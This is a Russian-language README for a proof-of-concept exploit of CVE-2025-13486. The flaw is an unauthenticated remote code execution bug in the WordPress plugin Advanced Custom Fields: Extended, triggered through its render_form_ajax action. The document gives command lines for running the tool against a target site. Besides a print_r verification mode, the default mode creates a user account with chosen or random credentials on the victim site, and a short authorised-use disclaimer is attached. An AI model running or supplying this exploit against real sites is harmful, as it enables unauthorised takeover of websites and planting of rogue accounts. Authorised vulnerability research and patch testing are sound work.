
PoC для CVE-2025-13486
Эксплойт Proof of Concept (PoC) для CVE-2025-13486, уязвимости удаленного выполнения кода в плагине WordPress Advanced Custom Fields: Extended (ACFE).
Эта уязвимость существует в версиях ACFE с 0.9.0.5 по 0.9.1.1, позволяя неаутентифицированным злоумышленникам выполнять произвольные PHP-функции через AJAX-действие acfe/form/render_form_ajax. Плагин использует call_user_func_array() с пользовательским вводом без надлежащей проверки.
print_r (без разрушающих действий)pip install requests
python poc.py -u http://target-site.com --verify
# With random credentials (displayed after execution)
python poc.py -u http://target-site.com
# With custom credentials
python poc.py -u http://target-site.com --user admin123 --password P@ssw0rd! --email [email protected]
-u, --url URL целевого WordPress (обязательно)
--verify Только проверка уязвимости (безопаснее, использует print_r)
--user Имя пользователя для создания (по умолчанию: случайное)
--password Пароль для установки (по умолчанию: случайный)
--email Адрес электронной почты (по умолчанию: случайный)
Данный PoC предоставляется только для образовательных и авторизованных целей тестирования безопасности. Несанкционированный доступ к компьютерным системам является незаконным. Всегда получайте надлежащее разрешение перед тестированием.